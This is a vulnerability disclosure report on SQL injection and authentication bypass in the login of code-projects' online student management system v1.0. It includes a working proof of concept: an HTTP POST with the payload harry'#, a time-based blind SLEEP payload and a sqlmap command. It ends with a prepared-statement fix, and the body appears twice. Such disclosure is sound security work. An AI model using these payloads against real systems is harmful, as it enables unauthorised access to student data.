code-projects online-student-management-system v1.0 SQL Injection - Authentication Bypass
NAME OF AFFECTED PRODUCT(S):
- online-student-management-system
Vendor Homepage :
Vuldb Submitter:
Vulnerable File:
- ~login.php
- ~/include/students.php
AFFECTED AND/OR FIXED VERSION(S):
Vulnerability Type:
-
SQL Injection
-
Authentication Bypass
Root Cause:
- Core description:
Unsafe data concatenation leads to SQL injection
- Detailed technical analysis:
Command and data injection: In the studAuthentication method of ~/include/students.php, the program directly concatenates the unprocessed variable $U_USERNAME into the SQL command string. Due to the lack of prepared statements, attackers can exploit SQL meta-characters (such as single quotation marks') to corrupt the original query semantics, injecting malicious SQL code into the database execution engine.
Authentication logic failure: Although the password undergoes Hash processing, the injection point occurs at the front end of the logical judgment. By using comment characters (such as # or --) in the username input, an attacker can force the truncation of the SQL statement, causing the database to ignore the key filtering condition of AND ACC_PASSWORD, resulting in the system completing authentication based solely on the username or constant truth logic (OR 1=1) without verifying the password.
Missing input validation: The caller, login.php, only uses trim() for processing, without performing whitelist verification (such as regular expression restrictions) or escaping on the input content, violating the security defense principle that "all external inputs are untrusted".
DESCRIPTION:
- A severe SQL injection vulnerability has been identified in the system authentication module. This vulnerability resides in the studAuthentication static method of the ~/include/students.php file. Due to the unsafe dynamic string concatenation employed by the program in constructing database queries, an attacker can bypass password verification logic by crafting a malicious username.
POC:
- U_USERNAME can be used to log in by using name'#, regardless of the password
POST /OnlineStudentManagementSystem_PHP/chmbac/login.php HTTP/1.1
Host: 192.168.1.29:8081
Content-Length: 53
Cache-Control: max-age=0
Origin: http://192.168.1.29:8081
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.29:8081/OnlineStudentManagementSystem_PHP/chmbac/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=5m2eqc48ap6ttud9f3le1naopm
Connection: keep-alive
U_USERNAME=harry'#&U_PASS=...&sidebarLogin=
Parameter: U_USERNAME (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: U_USERNAME=harr' AND (SELECT 9895 FROM (SELECT(SLEEP(5)))zPwT) AND 'JZBP'='JZBP&U_PASS=dffkdfjkfdsjf&sidebarLogin=The following are screenshots of some specific Managemen obtained from testing and running with the sqlmap tool:
sqlmap -u "http://192.168.1.29:8081/OnlineStudentManagementSystem_PHP/chmbac/login.php" \
--method POST \
--data "U_USERNAME=harr&U_PASS=dffkdfjkfdsjf&sidebarLogin=" \
-p U_USERNAME
Suggested Repair:
The core of the fix lies in separating SQL instructions from user data. Through prepared statements, the database first compiles the SQL template, and then binds user input only as "pure string parameters". At this point, injected single quotation marks ' or comment characters # are treated as ordinary characters and no longer have the ability to alter the SQL logic.
code-projects online-student-management-system v1.0 SQL Injection - Authentication Bypass
NAME OF AFFECTED PRODUCT(S):
Vendor Homepage :
Vuldb Submitter:
Vulnerable File:
AFFECTED AND/OR FIXED VERSION(S):
Vulnerability Type:
SQL Injection
Authentication Bypass
Root Cause:
Unsafe data concatenation leads to SQL injection
Command and data injection: In the studAuthentication method of ~/include/students.php, the program directly concatenates the unprocessed variable $U_USERNAME into the SQL command string. Due to the lack of prepared statements, attackers can exploit SQL meta-characters (such as single quotation marks') to corrupt the original query semantics, injecting malicious SQL code into the database execution engine.
Authentication logic failure: Although the password undergoes Hash processing, the injection point occurs at the front end of the logical judgment. By using comment characters (such as # or --) in the username input, an attacker can force the truncation of the SQL statement, causing the database to ignore the key filtering condition of AND ACC_PASSWORD, resulting in the system completing authentication based solely on the username or constant truth logic (OR 1=1) without verifying the password.
Missing input validation: The caller, login.php, only uses trim() for processing, without performing whitelist verification (such as regular expression restrictions) or escaping on the input content, violating the security defense principle that "all external inputs are untrusted".
DESCRIPTION:
POC:
Parameter: U_USERNAME (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: U_USERNAME=harr' AND (SELECT 9895 FROM (SELECT(SLEEP(5)))zPwT) AND 'JZBP'='JZBP&U_PASS=dffkdfjkfdsjf&sidebarLogin=The following are screenshots of some specific Managemen obtained from testing and running with the sqlmap tool:
sqlmap -u "http://192.168.1.29:8081/OnlineStudentManagementSystem_PHP/chmbac/login.php" \
--method POST \
--data "U_USERNAME=harr&U_PASS=dffkdfjkfdsjf&sidebarLogin=" \
-p U_USERNAME
Suggested Repair:
The core of the fix lies in separating SQL instructions from user data. Through prepared statements, the database first compiles the SQL template, and then binds user input only as "pure string parameters". At this point, injected single quotation marks ' or comment characters # are treated as ordinary characters and no longer have the ability to alter the SQL logic.